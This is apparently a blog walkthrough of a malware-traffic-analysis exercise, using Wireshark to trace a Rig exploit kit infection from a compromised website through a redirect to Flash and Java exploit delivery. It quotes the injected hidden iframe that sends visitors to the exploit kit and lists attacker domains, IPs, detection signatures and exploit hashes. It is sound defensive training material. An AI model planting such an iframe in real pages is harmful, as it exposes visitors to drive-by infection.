Introduction

In this post, we’ll inspect malicious traffics with Wireshark. Furthermore, we deeply analyze how threat actors utilize Exploit Kit (EK) to mount multiple Client-Side exploitation attacks on the network.

The PCAP packet can be downloaded here!.

( Note: The password for .zip is: infected. )

( Credit: www.malware-traffic-analysis.net )

Table of Content

1. Traffic overview → Establish a general idea of what traffic we’re looking at.
2. Q&A → Answers the questions in this page.

Traffic Overview

This phase is conducted to help us better comprehend the traffic environment we’re working on …

Protocol Hierarchy

Open the packet with Wireshark, we then navigate to Statistics → Protocol Hierarchy.

The output indicates most of the traffic occurs via the HTTP protocol. Hence, we’ll drop our attention toward this protocol in the upcoming investigations.

IPv4 addresses

Let’s us move on and inspect the unique IPv4 addresses.

From the Wireshark, we go to:

• Statistics → IPv4 Statistics → All Addresses.

• There are four highlighed IP addresses due to the high percent of them engaging in the traffic.

• We also notice that there are two ip addresses standing out extremely doubtful:

  • 37.200.69.143 → ~50%
  • 172.16.165.165 → 100%

Let’s keep them in mind since they might be useful for further analyses.

Resolved Address

Now, we continue looking at the Resolved Addresses. In orther words, they are domain names of the HTTP web applications.

• Statistics → Resolved Addresses → Hosts (instead of All entries)

The below image will best illustrate the idea.

• It’s worth noticing that *.google.com and java.com are trusted domains.

• That said, it’s trivial to investigate those domains unless the attacker manages to compromise either Google or Java, which I believe is not the case in this engagement.

Virus Total

Finally, we upload the .pcap file onto VirusTotal to potentially detect the attack classification.

The result implies that we might be dealing with a Client-Side Exploitation attack abusing Rig EK.

Note: More info of Rig EK can be found here.

Q&A

In this session, we will conduct the analyses by following along with the Questions.

Level 1

1) What is the IP address of the Windows VM that gets infected?

• Answer: 172.16.165.165

Explain

• 172.16.x.x is belonged to the private ip address range.
• As we conduct the investigation, the IP address 172.16.165.165 is known fully involving in all communication over the HTTP protocol.

Therefore, we can safely assume that it is the victim.

2) What is the host name of the Windows VM that gets infected?

• Answer: K34EN6W3N-PC

Explain

• From Wireshark, we either search for dhcp or nbns.

[1]. With dhcp, we can do as the following:

[2]. With nbns, we simply type nbns in the search bar.

3) What is the MAC address of the infected VM?

• Answer: f0:19:af:02:9b:f1

Explain

• Previously, we found the MAC address while looking for machine host name.

4) What is the IP address of the compromised web site?

• Answer: 82.150.140.30

5) What is the domain name of the compromised web site?

• Answer: www.ciniholland.nl

Explain (Q4 & Q5)

• Now, let’s us examine the requests made by the victim at 172.16.165.165.

• www.ciniholland.nl was the first web site that victim navigated to.

• If we inspect the timeframe after the web site was fully loaded, we’ll notice something is really strange …

• Within 3 seconds, the victim made two requests to other two different sites respectively.

• If our theory is correct, there is some sort of redirection happening at the back end. Bearing that in mind, we should consider testing the theory in the impending investigations.

6) What is the domain name of the compromised web site?

• Answer: 37.200.69.143

7) What is the domain name that delivered the exploit kit and malware?

• Answer: stand.trustandprobaterealty.com

Explain (Q6 & Q7)

• There were a large number of connection attempts against the domain stand.trustandprobaterealty.com by the victim.
• To view those connections, we filter traffics with the following search query: ip.src==172.16.165.165 and http.

• Now that we assume EK was delivered by stand.trustandprobaterealty.com, let’s us see more traffics between the malicious site and the victim.
• The search query is: ip.src==37.200.69.143 && ip.dst==172.16.165.165 && http

• The MIME application/x-msdownload indicates an executable file is presented in the message.

• In order words, the victim was unknowingly downloading an executable from the domain stand.trustandprobaterealty.com at that time.

Level 2

1) What is the redirect URL that points to the exploit kit (EK) landing page?

• Answer: 24corp-shop.com

Explain

• Recalling the timeframe, we notice that the page stand.trustandprobaterealty.com was loaded right after 24corp-shop.com.
• We assume that there is a type of redirection that leads the victim to land on the EK page.
• Let’s us further investigate the page source of the 24corp-shop.com domain.

[1]. We navigate to: File → Export Objects → HTTP.

[2]. On the new window popped up, we save the file as index.html.

[3]. Inspect the index.html …

[...snip...]
<body bgcolor=#ffffff><div align='center'><iframe src='http://stand.trustandprobaterealty.com/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg|ZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM' border=0 width=125 height=10 scrolling=no></iframe></div> 
[...snip...]

As expected, the litte iframe and src tags refers to the EK site!.

2) Besided the landing page (which contains the CVE-2013-2551 IE exploit), what other exploit(s) sent by the EK?

• Answer: Flash and Java

Explain

• There were two other MIMEs performed by the EK web site: application/x-shockwave-flash and application/java-archive.

• They respectively downloaded the Adobe Flash and Java files to the target system.

3) How many times was the payload delivered?

• Answer: 3

Explain

• Inspecting the following traffic, we can see that the payload with the same length of 401811 is retransmitted three times.

5) Submit the pcap to VirusTotal and find out what snort alerts triggered. What are the EK names are shown in the Suricata alerts?

Answer:

• There are 6 alerts generated by Snort:

  1. Senstive Data
  2. Potentially Bad Traffic
  3. Attempted User Privilege Gain
  4. A Network Trojan was detected
  5. Potential Corporate Privacy Violation
  6. Detection of a Denial of Service Attack 
  

• EK names are shown is the Suricata alerts:

  1. ET CURRENT_EVENTS Cool/BHEK/Goon Applet with Alpha-Numeric Encoded HTML entity [2017064]
  2. ET CURRENT_EVENTS GoonEK encrypted binary (3) [2018297]
  3. ET CURRENT_EVENTS Goon/Infinity URI Struct EK Landing May 05 2014 [2018441]
  4. ET CURRENT_EVENTS RIG EK Landing URI Struct [2019072]
  6. ET CURRENT_EVENTS RIG EK Landing Page Sept 17 2014 [2019193]
  8. ET CURRENT_EVENTS RIG EK Landing March 20 2015 M2 [2020726]
  

Level 3

1) What file or page from the compromised website has the malicious script with the URL for the redirect?

• Answer: /index.html of the compromised web site.

Explain

• On the search bar, we query: tcp.stream eq 6, then Follow → TCP Stream.

• Interestingly, a small script is embedded referred to the 24corp-shop.com site!.

2) Extract the exploit file(s). What is(are) the md5 file hash(es)?

• Answer:
  • Flash exploit: 7b3baa7d6bb3720f369219789e38d6ab
  • Java exploit: 1e34fdebbf655cebea78b45e43520ddf

Explain

• We can download those exploits by navigating to:
  • File → Export Objects → HTTP

then Save.

• Utilizing the md5sum command of *Unix, we can effectively extract MD5 hash of those file.

  $ md5sum flash  
  7b3baa7d6bb3720f369219789e38d6ab  flash
  $ md5sum java  
  1e34fdebbf655cebea78b45e43520ddf  java
  

Conclusion

• Throughout the analysis procedures, we exposed the methodologies used by attackers.
• While examining the HTTP communications, we also learned that EK could automatically mount multiple exploits against the victim web browser without their acknowledgement.